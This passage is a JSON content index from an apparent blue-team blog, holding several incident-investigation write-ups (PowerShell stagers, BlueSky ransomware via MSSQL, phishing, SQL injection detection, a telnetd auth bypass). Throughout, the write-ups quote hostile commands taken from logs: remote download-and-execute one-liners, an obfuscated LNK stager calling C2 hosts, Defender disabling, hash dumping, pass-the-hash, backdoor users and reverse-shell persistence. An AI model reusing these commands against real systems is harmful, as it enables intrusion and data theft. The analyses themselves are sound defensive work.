ID 4104 (Script Block Logging) captured the payload\u0026rsquo;s in-memory command at 2024-03-14 17:23:\n1EventID: 4104 2Script Block Text: \u0026#34;C:\\Windows\\system32\\cmd.exe\u0026#34; /c \u0026#34;powershell -command 3 IEX(IWR -UseBasicParsing \u0026#39;https://kionagranada.com/upload/sd2.ps1\u0026#39;)\u0026#34; 4Username: LetsDefend 5ProcessId: 6968 payload_1.ps1 used Invoke-WebRequest to download sd2.ps1 from kionagranada.com and immediately executed it in memory via Invoke-Expression — a fileless execution technique that leaves no file artifact on disk.\nA Sysmon Event ID 22 (DNS Query) confirmed the resolution:\n1EventID: 22 2QueryName: kionagranada.com 3QueryResult: 161.22.46.148 4Process: powershell.exe 5UtcTime: 2024-03-14 17:23:46 161.22.46.148 is the C2 Stage 1 server hosting the second-stage script. VirusTotal relations for this IP showed a communicating file sd4.ps1 (13/62 detections) and numerous ELF and executable files associated with the same infrastructure.\nC2 Stage 2 # VirusTotal relations for the second C2 IP 91.236.116.163 revealed a broad threat infrastructure including communicating files with names such as Chase_Bank_Statement_March.zip, Chase_Bank_Statement_March.lnk, WinFormGregorCatch.exe (56/71), and payload_1.js (34/62) — all consistent with a large-scale phishing and infostealer operation using banking lure themes.\nThe file 2024-04-03-https___kionaonline.com_modules_bonslick_agent3.ps1.txt (29/63) corroborates the agent3.ps1 internal name identified in the VirusTotal sample, linking both C2 IPs to the same campaign infrastructure.\nIOCs # Files\n- C:\\Users\\LetsDefend\\Downloads\\payload_1.ps1 — db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0\nNetwork\n- https://files-ld.s3.us-east-2.amazonaws.com/payload_1.ps1 — initial download\n- kionagranada.com / 161.22.46.148 — C2 Stage 1\n- https://kionagranada.com/upload/sd2.ps1 — second-stage payload\n- 91.236.116.163 — C2 Stage 2\nMITRE ATT\u0026amp;CK # Technique ID Description Phishing / Drive-by Download T1566 / T1189 payload_1.ps1 downloaded via Chrome PowerShell T1059.001 Script executed with Bypass policy Obfuscated Files or Information T1027 Fileless IEX(IWR) in-memory execution Ingress Tool Transfer T1105 sd2.ps1 fetched from C2 Command and Scripting Interpreter T1059 cmd.exe spawned by PowerShell Application Layer Protocol: HTTPS T1071.001 C2 communication over HTTPS Virtualization/Sandbox Evasion T1497 detect-debug-environment, long-sleeps ","date":"March 14, 2026","externalUrl":null,"permalink":"/blue_team/ld-soc153---suspicious-powershell-script-executed/","section":"","summary":"User Tony downloaded and executed a malicious PowerShell script (payload_1.ps1 / agent3.ps1) classified as trojan.powershell/boxter (Azorult family). The script bypassed execution policy, then fetched and invoked a second-stage payload from kionagranada.com (161.22.46.148), establishing a two-stage C2 chain with a final pivot to 91.236.116.163.","title":"LD-Suspicious PowerShell Script Executed","type":"blue_team"},{"content":"","date":"March 14, 2026","externalUrl":null,"permalink":"/tags/sandbox-evasion/","section":"Tags","summary":"","title":"Sandbox Evasion","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-03-10 TL;DR # The attacker at 87.96.21.84 performed a TCP port scan, identified an exposed MSSQL instance, and authenticated as sa with a weak password. After enabling xp_cmdshell, a base64-encoded PE was dropped to %TEMP% and decoded via a VBScript. A reverse shell provided full access, after which the attacker downloaded a PowerShell toolkit: checking.ps1 to disable Windows Defender and AV services, ichigo-lite.ps1 to dump NTLM hashes via Invoke-PowerDump and perform lateral movement via Invoke-SMBExec, and javaw.exe — the BlueSky ransomware payload staged to C:\\ProgramData\\.\nPackets Overview # Reconnaissance # The attacker at 87.96.21.84 performed a TCP port scan against the victim, discovering five open ports:\n1445 SMB 2139 NetBIOS 3135 Microsoft RPC 45357 WS-Discovery 51433 Microsoft SQL Server SQL Server Exploitation # The attacker enumerated the MSSQL instance and authenticated using the system administrator account:\n1Username: sa 2Password: cyb3rd3f3nd3r$ After gaining access, xp_cmdshell was enabled by changing its value from 0 to 1, allowing direct OS command execution from within SQL Server:\nA base64-encoded PE (TVqQ... = MZ signature) was transferred through the SQL connection and saved to %TEMP%\\SBjzH.b64:\nA VBScript decoder (Gjmwb.vbs) was then constructed via xp_cmdshell to read the base64 file, decode it, write the result to %TEMP%\\LkUYP.exe, and execute it silently — establishing a reverse shell:\n1EXEC master..xp_cmdshell \u0026#39;echo Set ofs = CreateObject(\u0026#34;Scripting.FileSystemObject\u0026#34;) 2 .OpenTextFile(\u0026#34;%TEMP%\\LkUYP.exe\u0026#34;, 2, True) \u0026gt;\u0026gt;%TEMP%\\Gjmwb.vbs 3\u0026amp; echo shell.run \u0026#34;%TEMP%\\LkUYP.exe\u0026#34;, 0, false \u0026gt;\u0026gt;%TEMP%\\Gjmwb.vbs ...\u0026#39; Privilege escalation and persistance # After the reverse shell was established, the attacker escalated privileges by injecting a payload into winlogon.exe using msfconsole. Event ID 400, which marks the start of a new PowerShell host process, confirmed SYSTEM-level execution:\nPost-Exploitation # After the reverse shell was established, the attacker downloaded a toolkit from http://87.96.21.84:\n1checking.ps1 — AV disabling + persistence 2del.ps1 — kill monitoring tools + WMI cleanup 3ichigo-lite.ps1 — hash dumping + lateral movement + ransomware staging 4Invoke-PowerDump.ps1 5Invoke-SMBExec.ps1 6javaw.exe — BlueSky ransomware payload checking.ps1 # Verified connectivity to http://87.96.21.84, then depending on privilege level executed one of two paths. With SYSTEM privileges it disabled Windows Defender via Set-MpPreference, stopped WinDefend, MBAMService, and Sophos services, set exclusion paths for C:\\ProgramData\\Oracle and C:\\Windows, and modified Defender registry keys to prevent re-enabling. It then created a scheduled task \\Microsoft\\Windows\\MUI\\LPupdate running del.ps1 every four hours as SYSTEM, and invoked ichigo-lite.ps1:\n1Set-MpPreference -DisableRealtimeMonitoring $true 2Set-MpPreference -ExclusionPath \u0026#34;C:\\ProgramData\\Oracle\u0026#34; 3Get-Service WinDefend | Stop-Service -Force 4C:\\Windows\\System32\\schtasks.exe /f /tn \u0026#34;\\Microsoft\\Windows\\MUI\\LPupdate\u0026#34; 5 /tr \u0026#34;powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\del.ps1\u0026#34; 6 /ru SYSTEM /sc HOURLY /mo 4 /create Without elevation, a lower-privilege scheduled task was created under a fake SID-named task name to blend with system tasks:\n1schtasks /create /tn \u0026#34;Optimize Start Menu Cache Files-S-3-5-21-...\u0026#34; /sc HOURLY /mo 3 del.ps1 # Removed WMI event subscriptions used for persistence detection, then killed monitoring and analysis tools to blind the defender:\n1Get-WmiObject _FilterToConsumerBinding -Namespace root\\subscription | Remove-WmiObject 2 3$list = \u0026#34;taskmgr\u0026#34;,\u0026#34;perfmon\u0026#34;,\u0026#34;SystemExplorer\u0026#34;,\u0026#34;taskman\u0026#34;,\u0026#34;ProcessHacker\u0026#34;, 4 \u0026#34;procexp64\u0026#34;,\u0026#34;procexp\u0026#34;,\u0026#34;Procmon\u0026#34;,\u0026#34;Daphne\u0026#34; 5foreach($task in $list) { stop-process -name $task -Force } 6stop-process $pid -Force ichigo-lite.ps1 # Loaded Invoke-PowerDump and Invoke-SMBExec from the C2, then dumped NTLM hashes to C:\\ProgramData\\hashes.txt:\n1Invoke-PowerDump | Out-File -FilePath \u0026#34;C:\\ProgramData\\hashes.txt\u0026#34; Parsed the hash file for usernames and NTLM hashes, fetched a target host list from http://87.96.21.84/extracted_hosts.txt, and performed pass-the-hash lateral movement against each host via SMB:\n1foreach ($targetHost in $hostsContent -split \u0026#34;`n\u0026#34;) { 2 Invoke-SMBExec -Target $targetHost -Username $username -Hash $password 3} Finally staged the ransomware payload:\n1$blueUri = \u0026#34;http://87.96.21.84/javaw.exe\u0026#34; 2$downloadDestination = \u0026#34;C:\\ProgramData\\javaw.exe\u0026#34; 3$downloadSuccess = Download-FileFromURL -url $blueUri -destinationPath $downloadDestination IOCs # Network\n- Attacker C2: 87.96.21.84\n- http://87.96.21.84/del.ps1\n- http://87.96.21.84/ichigo-lite.ps1\n- http://87.96.21.84/Invoke-PowerDump.ps1 - http://87.96.21.84/Invoke-SMBExec.ps1\n- http://87.96.21.84/extracted_hosts.txt\n- http://87.96.21.84/javaw.exe\nCredentials\n- sa:cyb3rd3f3nd3r$ — MSSQL sa account\nFiles\n- %TEMP%\\SBjzH.b64 — base64-encoded PE\n- %TEMP%\\LkUYP.exe — decoded reverse shell\n- %TEMP%\\Gjmwb.vbs — base64 decoder\n- C:\\ProgramData\\del.ps1\n- C:\\ProgramData\\hashes.txt — dumped NTLM hashes\n- C:\\ProgramData\\javaw.exe — BlueSky ransomware (SHA256:3e035f2d7d30869ce53171ef5a0f761bfb9c14d94d9fe6da385e20b8d96dc2fb)\nScheduled Tasks\n- \\Microsoft\\Windows\\MUI\\LPupdate — runs del.ps1 every 4h as SYSTEM\n- Optimize Start Menu Cache Files-S-3-5-21-... — low-priv fallback\nMITRE ATT\u0026amp;CK # Technique ID Description Network Service Scanning T1046 TCP port scan Exploit Public-Facing Application T1190 MSSQL xp_cmdshell abuse Valid Accounts T1078 sa account authentication Command and Scripting: PowerShell T1059.001 multi-stage PS toolkit Obfuscated Files or Information T1027 base64-encoded PE + commands Disable or Modify Tools T1562.001 Defender disabled via registry + cmdlet OS Credential Dumping: NTLM T1003.002 Invoke-PowerDump → hashes.txt Lateral Movement: SMB/Pass-the-Hash T1550.002 Invoke-SMBExec with dumped hashes Scheduled Task Persistence T1053.005 LPupdate + fake cache task Boot or Logon: Winlogon Helper T1547.004 Winlogon registry modification Ingress Tool Transfer T1105 javaw.exe staged from C2 Data Encrypted for Impact T1486 BlueSky ransomware (javaw.exe) Attack Chain # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Start([87.96.21.84Attacker]):::input --\u003e Scan[TCP Port Scan]:::exec subgraph Recon [Reconnaissance] Scan --\u003e Ports[Open: 445 139 135 5357 1433]:::exec end subgraph Initial_Access [Initial Access] Ports --\u003e SQLAuth[MSSQL Loginsa:cyb3rd3f3nd3r$]:::exec SQLAuth --\u003e XpCmd[Enable xp_cmdshell]:::exec XpCmd --\u003e Drop[Drop base64 PE%TEMP%\\SBjzH.b64]:::exec Drop --\u003e VBS[Gjmwb.vbs decoder→ LkUYP.exe]:::exec VBS --\u003e Shell((Reverse Shell)):::exec end subgraph Evasion [Defense Evasion] Shell --\u003e Checking[checking.ps1]:::exec Checking --\u003e DefOff[Disable DefenderSet-MpPreference + Registry]:::exec Checking --\u003e AVOff[Stop WinDefendMBAMService Sophos]:::exec Shell --\u003e DelPS[del.ps1]:::exec DelPS --\u003e WMI[Remove WMI Subscriptions]:::exec DelPS --\u003e Kill[Kill procexp taskmgrProcessHacker Procmon]:::exec end subgraph Persistence [Persistence] Checking --\u003e Task1[Schtask LPupdatedel.ps1 every 4h SYSTEM]:::exec Checking --\u003e Task2[Schtask fake cache namelow-priv fallback]:::exec Shell --\u003e Winlogon[Winlogon RegistryModification]:::exec end subgraph CredAccess [Credential Access \u0026 Lateral Movement] Shell --\u003e Ichigo[ichigo-lite.ps1]:::exec Ichigo --\u003e PowerDump[Invoke-PowerDump→ C:\\ProgramData\\hashes.txt]:::exec PowerDump --\u003e SMBExec[Invoke-SMBExecPass-the-Hash → extracted_hosts.txt]:::exec end subgraph Impact [Impact] Ichigo --\u003e Download2[Download javaw.exeC:\\ProgramData\\]:::exec Download2 --\u003e Ransom((BlueSky Ransomware)):::exec end ","date":"March 10, 2026","externalUrl":null,"permalink":"/investigations/cdef-bluesky-ransomware/","section":"","summary":"An attacker performed a port scan, exploited a Microsoft SQL Server via the sa account, enabled xp_cmdshell to drop and execute a base64-encoded payload, then deployed a multi-stage PowerShell toolkit to disable AV, dump NTLM hashes, perform lateral movement via SMB, and stage the BlueSky ransomware payload.","title":"CDEF-BlueSky Ransomware","type":"investigations"},{"content":"","date":"March 10, 2026","externalUrl":null,"permalink":"/tags/mssql/","section":"Tags","summary":"","title":"MSSQL","type":"tags"},{"content":" Email Containing Suspicious External Link # An inbound email was received by h.harris@thetrydaily.thm at 08:30:42 with the subject \u0026ldquo;Your Amazon Package Couldn\u0026rsquo;t Be Delivered – Action Required\u0026rdquo;. The sender address was urgents@amazon.biz — a domain that spoofs Amazon by substituting .com with .biz. The email body applied urgency pressure, threatening that the package would be returned within 48 hours, and included a shortened redirect link http://bit.ly/3sHkX3da12340 rather than any legitimate Amazon domain. No attachment was present.\nSeveral indicators confirm this is a phishing attempt: the sender domain is not amazon.com, the link is obfuscated via a URL shortener, and the message uses a classic urgency-based social engineering lure. The alert is classified as a True Positive — phishing email impersonating Amazon Delivery.\nAccess to Blacklisted External URL Blocked by Firewall # At 08:31:56 — approximately 70 seconds after the phishing email in alert 8815 arrived — the firewall triggered a block event originating from internal host 10.20.2.17:34257 attempting to reach 67.199.248.11:80 via http://bit.ly/3sHkX3da12340. The rule Blocked Websites matched and the connection was denied.\nThis event correlates directly with alert 8815: h.harris clicked the malicious bit.ly link from the fake Amazon email, and the firewall successfully blocked the outbound request before the destination was reached. The alert is classified as a True Positive — the firewall prevented the user from accessing the phishing payload. No compromise occurred, but the user interacted with the phishing email and requires awareness training.\nInbound Email Containing Suspicious External Link # At 08:33:00, c.allen@thetrydaily.thm received an email purportedly from no-reply@m1crosoftsupport.co with the subject \u0026ldquo;Unusual Sign-In Activity on Your Microsoft Account\u0026rdquo;. The sender domain m1crosoftsupport.co is a typosquat of Microsoft, replacing the letter i with 1. The email body claimed an unusual sign-in had been detected from Lagos, Nigeria (102.89.222.143, 2025-01-24 06:42) and directed the user to click https://m1crosoftsupport.co/login to review their account — a classic credential harvesting page disguised as a Microsoft security alert.\nCritically, the correlated firewall log at 08:34:09 shows that internal host 10.20.2.25:32653 successfully connected to 45.148.10.131:443 via https://m1crosoftsupport.co/login — the connection was allowed by the Allow-Internet rule. This confirms that c.allen clicked the link and reached the credential harvesting site approximately one minute after receiving the email. The domain was not present on the firewall blacklist at the time of access.\nThe alert is classified as a True Positive — an active phishing compromise is suspected. The user likely visited a credential harvesting page and may have submitted Microsoft account credentials. Immediate password reset for c.allen is recommended, along with escalation to Tier 2 for account activity review and retroactive blacklisting of m1crosoftsupport.co / 45.148.10.131.\n","date":"March 10, 2026","externalUrl":null,"permalink":"/blue_team/thm-phishing/","section":"","summary":"Three phishing campaigns were identified across four alerts: a legitimate HR onboarding email (false positive), a fake Amazon delivery notification whose bit.ly link was blocked by the firewall, and a Microsoft account spoofing email from m1crosoftsupport.co whose link was allowed through the firewall","title":"THM-Phishing","type":"blue_team"},{"content":"","date":"March 9, 2026","externalUrl":null,"permalink":"/tags/wazuh/","section":"Tags","summary":"","title":"Wazuh","type":"tags"},{"content":" Objective # Investigate a SQL Injection attack detected by Wazuh and Suricata targeting a DVWA instance, triage alerts, identify the attack pattern and tooling, and configure automated response to block the attacker IP.\nEnvironment # Role OS IP Attacker Kali Linux 192.168.248.129 Agent Ubuntu 22.04 Server 192.168.248.140 Wazuh Ubuntu 24.04 Server 192.168.248.50 What Wazuh Detected # Wazuh generated 85 alerts from source IP 192.168.248.129 over approximately 2 minutes. The alert spike began at 15:47 UTC and corresponds to automated SQL Injection tooling activity. MITRE ATT\u0026amp;CK: T1190 - Exploit Public-Facing Application.\nSix rule IDs were triggered during the attack:\nRule ID Level Description Count 31103 7 SQL injection attempt 28 31106 6 A web attack returned code 200 (success) 20 31171 6 SQL injection attempt (SELECT/INSERT) 16 31122 5 Web server 500 error code (Internal Error) 16 31152 10 Multiple SQL injection attempts from same IP 4 31162 10 Multiple web server 500 errors from same IP 1 Rules 31103, 31106, 31171, and 31122 fire per individual event. Rules 31152 and 31162 are correlation rules that aggregate multiple events into a higher severity alert (level 10).\n- 16 HTTP 500 responses confirm injected payloads reached the database layer and caused query execution errors — a reliable error-based SQLi indicator.\n- 20 HTTP 200 responses on rule 31106 mean a portion of payloads executed successfully and the server returned data.\n- Rule 31152 (level 10) fired 4 times after the frequency threshold for repeated SQLi attempts from a single IP was reached.\nExpanded view of a single Rule 31103 alert:\n- Source IP: 192.168.248.129\n- Target: 192.168.248.140\n- URL: /dvwa/vulnerabilities/sqli/?id=1%27+UNION+SELECT+1%2C2--\u0026amp;Submit=Submit\n- HTTP status: 500\n- Tool: sqlmap/1.10.2#stable — confirmed via User-Agent header\n- Technique: Boolean-based blind SQLi with CASE WHEN and CHR() functions\n- MITRE: T1190 - Exploit Public-Facing Application\n- Fired times: 28\n1{ 2 \u0026#34;agent\u0026#34;: { \u0026#34;ip\u0026#34;: \u0026#34;192.168.248.140\u0026#34;, \u0026#34;name\u0026#34;: \u0026#34;agent1\u0026#34;, \u0026#34;id\u0026#34;: \u0026#34;001\u0026#34; }, 3 \u0026#34;data\u0026#34;: { 4 \u0026#34;srcip\u0026#34;: \u0026#34;192.168.248.129\u0026#34;, 5 \u0026#34;id\u0026#34;: \u0026#34;200\u0026#34;, 6 \u0026#34;url\u0026#34;: \u0026#34;/dvwa/vulnerabilities/sqli/?id=1%27%20AND%204076%3D%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20CHR%28102%29%7C%7CCHR%2881%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%20FROM%20SYSIBM.SYSDUMMY1%29%3D%27fQzb%27%29%20THEN%204076%20ELSE%20%28SELECT%209431%20UNION%20SELECT%207597%29%20END%29%29--%20QdwI\u0026amp;Submit=Submit\u0026#34; 7 }, 8 \u0026#34;rule\u0026#34;: { 9 \u0026#34;id\u0026#34;: \u0026#34;31103\u0026#34;, 10 \u0026#34;level\u0026#34;: 7, 11 \u0026#34;description\u0026#34;: \u0026#34;SQL injection attempt.\u0026#34;, 12 \u0026#34;firedtimes\u0026#34;: 28, 13 \u0026#34;mitre\u0026#34;: { 14 \u0026#34;technique\u0026#34;: [\u0026#34;Exploit Public-Facing Application\u0026#34;], 15 \u0026#34;id\u0026#34;: [\u0026#34;T1190\u0026#34;], 16 \u0026#34;tactic\u0026#34;: [\u0026#34;Initial Access\u0026#34;] 17 } 18 }, 19 \u0026#34;full_log\u0026#34;: \u0026#34;192.168.248.129 - - [09/Mar/2026:14:17:26 +0000] \\\u0026#34;GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%204076%3D...--QdwI\u0026amp;Submit=Submit HTTP/1.1\\\u0026#34; 500 295 \\\u0026#34;http://192.168.248.140/dvwa/vulnerabilities/sqli/\\\u0026#34; \\\u0026#34;sqlmap/1.10.2#stable (https://sqlmap.org)\\\u0026#34;\u0026#34;, 20 \u0026#34;timestamp\u0026#34;: \u0026#34;2026-03-09T15:47:08.617+0000\u0026#34; 21} The User-Agent string sqlmap/1.10.2#stable in the full log confirms the attack was conducted with sqlmap — no inference required. The decoded URL payload reveals a boolean-based blind injection technique using CASE WHEN logic and CHR() character functions, consistent with sqlmap\u0026rsquo;s database fingerprinting phase.\nSuricata independently fingerprinted the source machine as Kali Linux via DHCP hostname at 15:44 UTC — before the web attack began — providing network-layer attribution unavailable from Apache logs alone.\nResponse # Active response was configured on the Wazuh Manager to automatically block the attacker IP via firewall-drop upon rule 31152 triggering. Configuration added to /var/ossec/etc/ossec.conf:\n1\u0026lt;active-response\u0026gt; 2 \u0026lt;command\u0026gt;firewall-drop\u0026lt;/command\u0026gt; 3 \u0026lt;location\u0026gt;local\u0026lt;/location\u0026gt; 4 \u0026lt;rules_id\u0026gt;31152\u0026lt;/rules_id\u0026gt; 5 \u0026lt;timeout\u0026gt;0\u0026lt;/timeout\u0026gt; 6\u0026lt;/active-response\u0026gt; timeout is set to 0 — the block is permanent and requires manual review before removal. This is appropriate for a confirmed TP where the source IP shows no legitimate use case.\nConclusion # Wazuh successfully detected the SQL Injection attack out of the box, generating 85 alerts across 6 rule IDs. The attacker tool was confirmed directly from the User-Agent header (sqlmap/1.10.2#stable) without any inference. Correlation rules 31152 and 31162 fired automatically without custom configuration, and active response permanently blocked the attacker IP upon threshold being reached — without manual intervention.\n","date":"March 9, 2026","externalUrl":null,"permalink":"/blue_team/wazuh-injection/","section":"","summary":"Detected a SQL Injection attack, observed 85 alerts across 6 rule IDs, and configured automated IP blocking via active response.","title":"Wazuh + Suricata: injection detection","type":"blue_team"},{"content":" Difficulty: Easy OS: Windows Date: 2026-03-07 TL;DR # A phishing email impersonating an EU Health Logistics Office delivered a password-protected ZIP containing a malicious LNK file and a decoy PDF. The LNK executed an obfuscated PowerShell stager that opened the PDF as a distraction, collected system fingerprint data, checked in to health-status-rs.com, and fetched a next-stage implant from advent-of-the-relics-forum.htb.blue using hardcoded credentials svc_temp:SnowBlackOut_2026!.\nInitial Analysis # At Fri, 14 Nov 2025 20:33:15 a phishing email was sent from eu-health@ca1e-corp.org — spoofing a legitimate-looking EU Health Logistics Office address to target kamil.poltavez@cale-corp.org:\n1From: EU Health Logistics Office \u0026lt;eu-health@ca1e-corp.org\u0026gt; 2To: kamil.poltavez@cale-corp.org The email contained an attached ZIP file:\n1Health_Clearance-December_Archive.zip The email body contained two base64-encoded blobs — the first decoded to the email body text, the second to the ZIP archive itself. Decoding both revealed the archive password: Up7Pk99G.\nUnpacking the archive with the password yielded two files:\n1EU_Health_Compliance_Portal.lnk 2Health_Clearance_Guidelines.pdf Static Analysis # Shortcut # The shortcut contained an obfuscated PowerShell one-liner. First, it opened the decoy PDF via saps .\\Health_Clearance_Guidelines.pdf to distract the victim while the payload executed in the background.\nThe script then collected a system fingerprint — $env:USERNAME, $env:USERDOMAIN, and MachineGuid from HKLM:\\SOFTWARE\\Microsoft\\Cryptography — and POSTed it to https://health-status-rs.com/api/v1/checkin, receiving a session ID in response. Using the returned session ID, it fetched the next-stage implant from https://advent-of-the-relics-forum.htb.blue/api/v1/implant/cid=\u0026lt;id\u0026gt; and piped the response directly into Invoke-Expression for execution.\n1C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nONi -nOp -eXeC bYPaSs -cOmManD \u0026#34; 2$Bs = (-join(\u0026#39;Basic c3\u0026#39;,\u0026#39;ZjX3Rlb\u0026#39;,\u0026#39;XA6U2\u0026#39;,\u0026#39;5\u0026#39;,\u0026#39;vd0JsY\u0026#39;,\u0026#39;WNrT\u0026#39;,\u0026#39;3V\u0026#39;,\u0026#39;0X\u0026#39;,\u0026#39;zIwM\u0026#39;,\u0026#39;jYh\u0026#39;));sap`s .\\Health_Clearance_Guidelines.pdf; 3$AX=$env:USERNAME;$oM=[System.Uri]::UnescapeDataString(\u0026#39;https%3A%2F%2Fhealth%2Dstatus%2Drs%2Ecom%2Fapi%2Fv1%2Fcheckin\u0026#39;); 4$Bz=$env:USERDOMAIN;$Lj=[System.Uri]::UnescapeDataString(\u0026#39;https%3A%2F%2Fadvent%2Dof%2Dthe%2Drelics%2Dforum%2Ehtb%2Eblue%2Fapi%2Fv1%2Fimplant%2Fcid%3D\u0026#39;); 5$Mw=(gp HKLM:\\SOFTWARE\\Microsoft\\Cryptography).MachineGuid; 6$pP = @{u=$AX;d=$Bz;g=$Mw}; 7$Zu=(i`wr $oM -Method POST -Body $pP).Content;$Hd = @{Authorization = $Bs };i`wr -Headers $Hd $Lj$Zu | i`ex;\u0026#34; The authorization header was assembled from split string fragments to evade static detection. Decoded, it contained hardcoded credentials:\n1Basic c3ZjX3RlbXA6U25vd0JsYWNrT3V0XzIwMjYh 2 -\u0026gt; svc_temp:SnowBlackOut_2026! PDF # The PDF was confirmed legitimate with no malicious content — no JavaScript, no embedded files, no launch actions, no OpenAction triggers:\n1PDFiD 0.2.8 Health_Clearance_Guidelines.pdf 2 PDF Header: %PDF-1.4 3 obj 314 4 endobj 314 5 stream 14 6 endstream 14 7 /Page 3 8 /Encrypt 0 9 /JS 0 10 /JavaScript 0 11 /OpenAction 0 12 /Launch 0 13 /EmbeddedFile 0 Its sole purpose was to serve as a convincing decoy while the LNK payload executed in the background.\nIOCs # Files\n- Health_Clearance-December_Archive.zip — password: Up7Pk99G\n- EU_Health_Compliance_Portal.lnk — malicious shortcut\n- Health_Clearance_Guidelines.pdf — benign decoy\nNetwork\n- C2 check-in: https://health-status-rs.com/api/v1/checkin\n- Implant delivery: https://advent-of-the-relics-forum.htb.blue/api/v1/implant/cid=\n- Sender domain: ca1e-corp.org (typosquat of cale-corp.org)\nCredentials\n- svc_temp:SnowBlackOut_2026! — hardcoded Basic auth\nMITRE ATT\u0026amp;CK # Technique ID Description Phishing: Spearphishing Attachment T1566.001 ZIP with LNK delivered via email User Execution: Malicious File T1204.002 victim opens LNK Command and Scripting: PowerShell T1059.001 obfuscated PS stager Masquerading T1036 LNK disguised as portal document System Information Discovery T1082 USERNAME, USERDOMAIN, MachineGuid Application Layer Protocol: HTTPS T1071.001 C2 over HTTPS Ingress Tool Transfer T1105 implant fetched from C2 ","date":"March 7, 2026","externalUrl":null,"permalink":"/investigations/htb-a-call-from-the-museum/","section":"","summary":"A phishing email with a password-protected ZIP delivered an LNK file that executed an obfuscated PowerShell stager — collecting system fingerprint data, checking in to a C2, and fetching a next-stage implant using hardcoded credentials. A decoy PDF was opened simultaneously to distract the victim.","title":"HTB-A Call from the Museum","type":"investigations"},{"content":"","date":"March 7, 2026","externalUrl":null,"permalink":"/tags/pdf/","section":"Tags","summary":"","title":"PDF","type":"tags"},{"content":"","date":"March 6, 2026","externalUrl":null,"permalink":"/tags/cve-2026-24061/","section":"Tags","summary":"","title":"CVE-2026-24061","type":"tags"},{"content":" Difficulty: Very Easy OS: Windows Date: 2026-03-06 TL;DR # An attacker at 192.168.72.136 exploited CVE-2026-24061 in GNU inetutils telnetd to gain an unauthenticated root shell via Telnet option negotiation abuse. A backdoor user cleanupsvc was created, and the linper.sh persistence toolkit was deployed across cron and systemd. The attacker then stood up an HTTP server and exfiltrated credit-cards-25-blackfriday.db before deleting it from the victim.\nPackets overview # CVE-2026-24061 # CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils telnetd. During Telnet option negotiation, a remote client can inject environment variables using the NEW-ENVIRON mechanism (RFC 1572). On vulnerable versions, the value of USER is forwarded unsanitized to the system login program — setting USER=-f root causes login to treat the session as pre-authenticated, yielding an unauthenticated root shell. The injected value is interpreted as a command-line flag rather than a username because telnetd passes USER directly as an argument to /bin/login.\nAt 2026-01-27 10:39 the attacker (192.168.72.136) exploited CVE-2026-24061 and obtained root access without credentials.\nPersistence # After gaining root, the attacker created a backdoor user with a hardcoded password:\n1sudo useradd -m -s /bin/bash cleanupsvc 2echo \u0026#34;cleanupsvc:YouKnowWhoiam69\u0026#34; | sudo chpasswd The persistence toolkit linper.sh was then downloaded from GitHub:\n1wget https://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh linper.sh installed reverse shell callbacks using awk, bash, nc, perl, pwsh, python3, and telnet across multiple persistence locations targeting 91.99.25.54:\n1bash linper.sh --enum-defenses 91.99.25.54 2Persistence Installed: awk using /var/spool/cron/crontabs/root 3Persistence Installed: awk using /etc/crontab 4Persistence Installed: awk using /etc/cron.d/ 5Persistence Installed: awk using /etc/systemd/ 6----------------------- 7Persistence Installed: bash using /var/spool/cron/crontabs/root 8Persistence Installed: bash using /etc/crontab 9Persistence Installed: bash using /etc/cron.d/ 10Persistence Installed: bash using /etc/systemd/ 11Persistence Installed: bash using /etc/rc.local 12...[snip]... Persistence locations written:\n1/var/spool/cron/crontabs/root 2/etc/crontab 3/etc/cron.d/ 4/etc/systemd/ 5/etc/rc.local Exfiltration # The attacker deployed an HTTP server on port 6932 and at 2026-01-27 10:49:54 exfiltrated credit-cards-25-blackfriday.db, then deleted the file from the victim server to cover their tracks.\nIOCs # Network\n- Attacker: 192.168.72.136\n- C2: 91.99.25.54\n- Exfil server port: 6932\nFiles\n- credit-cards-25-blackfriday.db — exfiltrated and deleted\n- linper.sh — persistence toolkit from github.com/montysecurity/linper\nCredentials\n- cleanupsvc:YouKnowWhoiam69 — backdoor user\nMITRE ATT\u0026amp;CK # Technique ID Description Exploit Public-Facing Application T1190 CVE-2026-24061 telnetd auth bypass Create Account: Local Account T1136.001 backdoor user cleanupsvc Scheduled Task/Job: Cron T1053.003 linper.sh crontab persistence Boot or Logon Initialization Scripts T1037 /etc/rc.local persistence Systemd Service T1543.002 /etc/systemd/ persistence Exfiltration Over Alternative Protocol T1048 HTTP server on port 6932 Data Destruction T1485 deleted db file post-exfiltration ","date":"March 6, 2026","externalUrl":null,"permalink":"/investigations/htb-telly/","section":"","summary":"An attacker exploited CVE-2026-24061, an authentication bypass in GNU inetutils telnetd, to obtain an unauthenticated root shell, established persistence via linper.sh across multiple cron and systemd locations, and exfiltrated a credit card database before deleting it from the victim server.","title":"HTB-Telly","type":"investigations"},{"content":"","date":"March 6, 2026","externalUrl":null,"permalink":"/tags/telnet/","section":"Tags","summary":"","title":"Telnet","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/anti-debugging/","section":"Tags","summary":"","title":"Anti-Debugging","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/capa/","section":"Tags","summary":"","title":"Capa","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/capev2/","section":"Tags","summary":"","title":"CAPEv2","type":"tags"},{"content":" Difficulty: Insane OS: Windows Date: 2026-02-28 TL;DR # A Dridex loader DLL with minimal static imports (OutputDebugStringA, Sleep). It dynamically resolves all 